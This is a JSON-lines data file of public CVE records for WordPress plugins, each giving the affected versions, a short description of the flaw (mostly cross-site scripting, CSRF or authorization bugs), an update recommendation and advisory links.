{"CVE_ID":"CVE-2024-9927","slug":"wooCommerce-order-proposal","versionImpact":"2.0.5","versionEndExcluding":"2.0.6","description":"The WooCommerce Order Proposal plugin for WordPress is vulnerable to privilege escalation via order proposal in all versions up to and including 2.0.5. This is due to the improper implementation of allow_payment_without_login function. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to log in to WordPress as an arbitrary user account, including administrators.","recommendation":"Update to version 2.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdc993a4-6f65-4570-811c-13a80dbec064?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdc993a4-6f65-4570-811c-13a80dbec064?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpovernight.com\\\/downloads\\\/woocommerce-order-proposal\\\/\",\"name\":\"https:\\\/\\\/wpovernight.com\\\/downloads\\\/woocommerce-order-proposal\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5646","slug":"futurio-extra","versionImpact":"2.0.5","versionEndExcluding":"2.0.6","description":"The Futurio Extra plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018header_size\u2019 attribute within the Advanced Text Block widget in all versions up to, and including, 2.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbb3bd9b-ac1f-4488-931f-2ba37576df2d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbb3bd9b-ac1f-4488-931f-2ba37576df2d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/futurio-extra\\\/tags\\\/2.0.5\\\/inc\\\/elementor\\\/widgets\\\/advanced-text-block.php#L265\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/futurio-extra\\\/tags\\\/2.0.5\\\/inc\\\/elementor\\\/widgets\\\/advanced-text-block.php#L265\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3100491\\\/#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3100491\\\/#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5325","slug":"woo-vietnam-checkout","versionImpact":"2.0.5","versionEndExcluding":"2.0.6","description":"The Woocommerce Vietnam Checkout WordPress plugin before 2.0.6 does not escape the custom shipping phone field on the checkout form leading to XSS","recommendation":"Update to version 2.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e93841ef-e113-41d3-9fa1-b21af85bd812\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e93841ef-e113-41d3-9fa1-b21af85bd812\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10937","slug":"related-post","versionImpact":"2.0.58","versionEndExcluding":"2.0.59","description":"The Related Posts, Inline Related Posts, Contextual Related Posts, Related Content By PickPlugins plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.0.58 via the wp_ajax_nopriv_related_post_ajax_get_post_ids AJAX action. This makes it possible for unauthenticated attackers to extract sensitive data including titles of posts in draft status.","recommendation":"Update to version 2.0.59, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3199720%40related-post%2Ftrunk&old=3126666%40related-post%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3199720%40related-post%2Ftrunk&old=3126666%40related-post%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85f7c69d-0b48-47af-9451-3cfd4326ffe5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85f7c69d-0b48-47af-9451-3cfd4326ffe5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25214","slug":"wpshopify","versionImpact":"2.0.4","versionEndExcluding":"2.0.5","description":"The ShopWP plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on several REST API routes in versions up to, and including, 2.0.4. This makes it possible for unauthenticated attackers to call the endpoints and perform unauthorized actions such as updating the plugin's settings and injecting malicious scripts.","recommendation":"Update to version 2.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d04f11b4-ee58-428b-aaa2-dc7d9f3e68e3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d04f11b4-ee58-428b-aaa2-dc7d9f3e68e3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2132502%40wpshopify&new=2132502%40wpshopify&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2132502%40wpshopify&new=2132502%40wpshopify&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4836","slug":"user-private-files","versionEndExcluding":"2.0.5","description":"The WordPress File Sharing Plugin WordPress plugin before 2.0.5 does not check authorization before displaying files and folders, allowing users to gain access to those files by manipulating IDs which can easily be brute forced","recommendation":"Update to version 2.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2023-4836-user-private-files-idor-to-sensitive-data-and-private-files-exposure-leak-of-info-poc\",\"name\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2023-4836-user-private-files-idor-to-sensitive-data-and-private-files-exposure-leak-of-info-poc\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c17f2534-d791-4fe3-b45b-875777585dc6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c17f2534-d791-4fe3-b45b-875777585dc6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-22735","slug":"tag-groups","versionImpact":"2.0.4","versionEndExcluding":"2.0.5","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in TaxoPress WordPress Tag Cloud Plugin \u2013 Tag Groups allows Reflected XSS. This issue affects WordPress Tag Cloud Plugin \u2013 Tag Groups: from n\/a through 2.0.4.","recommendation":"Update to version 2.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/tag-groups\\\/vulnerability\\\/wordpress-tag-cloud-plugin-tag-groups-plugin-2-0-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/tag-groups\\\/vulnerability\\\/wordpress-tag-cloud-plugin-tag-groups-plugin-2-0-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6963","slug":"getwid","versionImpact":"2.0.4","versionEndExcluding":"2.0.5","description":"The Getwid \u2013 Gutenberg Blocks plugin for WordPress is vulnerable to CAPTCHA Bypass in versions up to, and including, 2.0.4. This makes it possible for unauthenticated attackers to bypass the Captcha Verification of the Contact Form block by omitting 'g-recaptcha-response' from the 'data' array.","recommendation":"Update to version 2.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d317f2c7-06f3-4875-9f9b-eb7f450aa2f4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d317f2c7-06f3-4875-9f9b-eb7f450aa2f4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022982\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022982\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6959","slug":"getwid","versionImpact":"2.0.4","versionEndExcluding":"2.0.5","description":"The Getwid \u2013 Gutenberg Blocks plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the recaptcha_api_key_manage function in all versions up to, and including, 2.0.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to add, modify, or delete the 'Recaptcha Site Key' and 'Recaptcha Secret Key' settings.","recommendation":"Update to version 2.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/774c00fb-82cd-44ca-bf96-3f6dfd1977d0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/774c00fb-82cd-44ca-bf96-3f6dfd1977d0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022982\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022982\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4487","slug":"blocksy-companion","versionImpact":"2.0.45","versionEndExcluding":"2.0.46","description":"The Blocksy Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG uploads in versions up to, and including, 2.0.45 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.46, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084198\\\/#file18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084198\\\/#file18\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blocksy-companion\\\/tags\\\/2.0.45\\\/framework\\\/features\\\/svg.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blocksy-companion\\\/tags\\\/2.0.45\\\/framework\\\/features\\\/svg.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5208529c-4ac3-42a4-82d0-7f4d2e486236?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5208529c-4ac3-42a4-82d0-7f4d2e486236?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-43237","slug":"tag-groups","versionImpact":"2.0.3","versionEndExcluding":"2.0.4","description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in TaxoPress WordPress Tag Cloud Plugin \u2013 Tag Groups. This issue affects WordPress Tag Cloud Plugin \u2013 Tag Groups: from n\/a through 2.0.3.","recommendation":"Update to version 2.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/tag-groups\\\/wordpress-tag-groups-plugin-2-0-3-sensitive-data-exposure-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/tag-groups\\\/wordpress-tag-groups-plugin-2-0-3-sensitive-data-exposure-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6786","slug":"payment-gateway-for-telcell","versionImpact":"2.0.3","versionEndExcluding":"2.0.4","description":"The Payment Gateway for Telcell WordPress plugin through 2.0.1 does not validate the api_url parameter before redirecting the user to its value, leading to an Open Redirect issue","recommendation":"Update to version 2.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f3e64947-3138-4ec4-86c4-27b5d6a5c9c2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f3e64947-3138-4ec4-86c4-27b5d6a5c9c2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3836","slug":"seed-social","versionImpact":"2.0.3","versionEndExcluding":"2.0.4","description":"The Seed Social WordPress plugin before 2.0.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/64e144fb-aa9f-4cfe-9c44-a4e1fa2e8dd5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/64e144fb-aa9f-4cfe-9c44-a4e1fa2e8dd5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8499","slug":"woo-checkout-field-editor-pro","versionImpact":"2.0.3","versionEndExcluding":"2.0.4","description":"The Checkout Field Editor (Checkout Manager) for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018render_review_request_notice\u2019 function in all versions up to, and including, 2.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81eb8963-548f-4e94-83bd-266a19c09aab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81eb8963-548f-4e94-83bd-266a19c09aab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-checkout-field-editor-pro\\\/trunk\\\/admin\\\/class-thwcfd-admin.php#L426\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-checkout-field-editor-pro\\\/trunk\\\/admin\\\/class-thwcfd-admin.php#L426\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160299\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160299\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4603","slug":"star-cloudprnt-for-woocommerce","versionImpact":"2.0.3","versionEndExcluding":"2.0.4","description":"The Star CloudPRNT for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'printersettings' parameter in versions up to, and including, 2.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/110c6d41-e814-41c9-a3e7-d94ec3d953e6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/110c6d41-e814-41c9-a3e7-d94ec3d953e6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1cRVH7Oz6M2U2XTbNAmm43PDKBw6FzShA\\\/view?usp=sharing\",\"name\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1cRVH7Oz6M2U2XTbNAmm43PDKBw6FzShA\\\/view?usp=sharing\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2991002\\\/star-cloudprnt-for-woocommerce\\\/trunk?contextall=1&old=2510015&old_path=%2Fstar-cloudprnt-for-woocommerce%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2991002\\\/star-cloudprnt-for-woocommerce\\\/trunk?contextall=1&old=2510015&old_path=%2Fstar-cloudprnt-for-woocommerce%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4512","slug":"better-font-awesome","versionEndExcluding":"2.0.4","description":"The Better Font Awesome WordPress plugin before 2.0.4 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7957f355-c767-4f59-bb28-0302d33386a6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7957f355-c767-4f59-bb28-0302d33386a6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12501","slug":"simple-locator","versionImpact":"2.0.3","versionEndExcluding":"2.0.4","description":"The Simple Locator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 2.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-locator\\\/tags\\\/2.0.3\\\/app\\\/API\\\/AllLocationsShortcode.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-locator\\\/tags\\\/2.0.3\\\/app\\\/API\\\/AllLocationsShortcode.php#L19\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-locator\\\/tags\\\/2.0.3\\\/app\\\/API\\\/FormShortcode.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-locator\\\/tags\\\/2.0.3\\\/app\\\/API\\\/FormShortcode.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207747%40simple-locator&new=3207747%40simple-locator&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207747%40simple-locator&new=3207747%40simple-locator&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38cb5e43-56d0-40b6-936a-f10f15d2e72f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38cb5e43-56d0-40b6-936a-f10f15d2e72f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5200","slug":"flowpaper-lite-pdf-flipbook","versionImpact":"2.0.3","versionEndExcluding":"2.0.4","description":"The flowpaper plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'flipbook' shortcode in versions up to, and including, 2.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31d6288d-87f0-4822-b3f4-541f70cf99fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31d6288d-87f0-4822-b3f4-541f70cf99fd?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2966821\\\/flowpaper-lite-pdf-flipbook\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2966821\\\/flowpaper-lite-pdf-flipbook\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flowpaper-lite-pdf-flipbook\\\/trunk\\\/flowpaper.php?rev=2959754#L395\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flowpaper-lite-pdf-flipbook\\\/trunk\\\/flowpaper.php?rev=2959754#L395\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4706","slug":"genesis-columns-advanced","versionEndExcluding":"2.0.4","description":"The Genesis Columns Advanced WordPress plugin before 2.0.4 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as a contributor to perform Stored Cross-Site Scripting attacks which could be used against high-privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/30882a45-ca03-4ff1-a36d-758d9b9b641c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/30882a45-ca03-4ff1-a36d-758d9b9b641c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11456","slug":"contest-code-checker","versionImpact":"2.0.3","versionEndExcluding":"2.0.4","description":"The Run Contests, Raffles, and Giveaways with ContestsWP plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.0.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3192738\\\/contest-code-checker\\\/trunk\\\/free\\\/admin\\\/prizes\\\/class-prizes-table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3192738\\\/contest-code-checker\\\/trunk\\\/free\\\/admin\\\/prizes\\\/class-prizes-table.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b68ff1e-ef79-4c11-a73c-591177d8dffe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b68ff1e-ef79-4c11-a73c-591177d8dffe?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2392","slug":"blocksy-companion","versionImpact":"2.0.31","versionEndExcluding":"2.0.32","description":"The Blocksy Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Newsletter widget in all versions up to, and including, 2.0.31 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b937cbfb-d43c-4cda-b247-921661cbc0ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b937cbfb-d43c-4cda-b247-921661cbc0ad?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3051797%40blocksy-companion&new=3051797%40blocksy-companion&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3051797%40blocksy-companion&new=3051797%40blocksy-companion&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5194","slug":"wp-map-block","versionImpact":"2.0.2","versionEndExcluding":"2.0.3","description":"The WP Map Block WordPress plugin before 2.0.3 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 2.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f90b7ad6-e2a2-4833-a390-a78c64dc2382\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f90b7ad6-e2a2-4833-a390-a78c64dc2382\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3508","slug":"woocommerce-pre-orders","versionEndExcluding":"2.0.3","description":"The WooCommerce Pre-Orders WordPress plugin before 2.0.3 has a flawed CSRF check when processing its tab actions, which could allow attackers to make logged in admins email pre-orders customer, change the released date, mark all pre-orders of a specific product as complete or cancel via CSRF attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/064c7acb-db57-4537-8a6d-32f7ea31c738\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/064c7acb-db57-4537-8a6d-32f7ea31c738\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3507","slug":"woocommerce-pre-orders","versionEndExcluding":"2.0.3","description":"The WooCommerce Pre-Orders WordPress plugin before 2.0.3 has a flawed CSRF check when canceling pre-orders, which could allow attackers to make logged in admins cancel arbitrary pre-orders via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e72bbe9b-e51d-40ab-820d-404e0cb86ee6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e72bbe9b-e51d-40ab-820d-404e0cb86ee6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11877","slug":"cricket-score","versionImpact":"2.0.2","versionEndExcluding":"2.0.3","description":"The Cricket Live Score plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cricket_score' shortcode in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cricket-score\\\/tags\\\/2.0.2\\\/src\\\/connectFscore.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cricket-score\\\/tags\\\/2.0.2\\\/src\\\/connectFscore.php#L19\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9fe750f-5d8f-4c47-9d75-d928f1367fa8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9fe750f-5d8f-4c47-9d75-d928f1367fa8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8491","slug":"easy-pdf-restaurant-menu-upload","versionImpact":"2.0.2","versionEndExcluding":"2.0.3","description":"The Easy restaurant menu manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.2. This is due to missing or incorrect nonce validation on the nsc_eprm_save_menu() function. This makes it possible for unauthenticated attackers to upload a menu file via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pdf-restaurant-menu-upload\\\/tags\\\/2.0.2\\\/class\\\/class-admin-settings-nsc_eprm.php#L95\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pdf-restaurant-menu-upload\\\/tags\\\/2.0.2\\\/class\\\/class-admin-settings-nsc_eprm.php#L95\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3338246\\\/easy-pdf-restaurant-menu-upload\\\/trunk\\\/class\\\/class_admin_easy_pdf_restaurant_menu.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3338246\\\/easy-pdf-restaurant-menu-upload\\\/trunk\\\/class\\\/class_admin_easy_pdf_restaurant_menu.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a349b220-5b42-4b98-869f-ce8399fe7ec9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a349b220-5b42-4b98-869f-ce8399fe7ec9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
